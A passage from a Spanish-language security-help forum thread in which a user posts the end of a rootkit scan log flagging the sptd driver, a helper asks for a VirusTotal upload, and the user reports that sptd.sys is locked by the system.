      22:13:57.0140 2516 \Device\Harddisk2\DR2 - ok
      22:13:57.0140 2516 ================ Scan VBR ==================================
      22:13:57.0145 2516 [ A997CAA8AD0CF662D1531A97A908A0AA ] \Device\Harddisk0\DR0\Partition1
      22:13:57.0146 2516 \Device\Harddisk0\DR0\Partition1 - ok
      22:13:57.0156 2516 [ 112A52A84C0EC373585DD1EF889359C7 ] \Device\Harddisk0\DR0\Partition2
      22:13:57.0158 2516 \Device\Harddisk0\DR0\Partition2 - ok
      22:13:57.0161 2516 [ A4C9D0C491204A5EBD3EAD35228030F4 ] \Device\Harddisk1\DR1\Partition1
      22:13:57.0163 2516 \Device\Harddisk1\DR1\Partition1 - ok
      22:13:57.0167 2516 [ 3D48BED35F830D481677E7CB7C72F073 ] \Device\Harddisk2\DR2\Partition1
      22:13:57.0169 2516 \Device\Harddisk2\DR2\Partition1 - ok
      22:13:57.0170 2516 ============================================================
      22:13:57.0170 2516 Scan finished
      22:13:57.0170 2516 ============================================================
      22:13:57.0183 5972 Detected object count: 1
      22:13:57.0183 5972 Actual detected object count: 1
      22:14:11.0539 5972 sptd ( LockedFile.Multi.Generic ) - skipped by user
      22:14:11.0539 5972 sptd ( LockedFile.Multi.Generic ) - User select action: Skip

    9. #19
      Ex-Colaborador Avatar de Marr0n
      Registrado
      mar 2010
      Ubicación
      Catalunya
      Mensajes
      5.871

      Re: Malware en mi web ¿PC infectado?

      Sube el archivo sospechoso a: www.virustotal.com

      Me pegas el link del archivo una vez subido.
      * Síguenos en nuestro Twitter y hazte nuestro amigo en Facebook.
      * Infórmate de las ultimas amenazas de la red desde: InfoSpyware Blog
      * No se resuelven dudas por Privados ni por E-mail, ya que para eso esta el foro.

    10. #20
      Usuario Avatar de chasly
      Registrado
      nov 2010
      Ubicación
      Badalona
      Mensajes
      22

      Re: Malware en mi web ¿PC infectado?

      Hola.

      El archivo es C:\Windows\System32\Drivers\sptd.sys , cuando intento cargarlo me sale un mensaje de que no puede por que está siendo usado por System. He intentado hacer una copia pero tampoco me deja.

      Carlos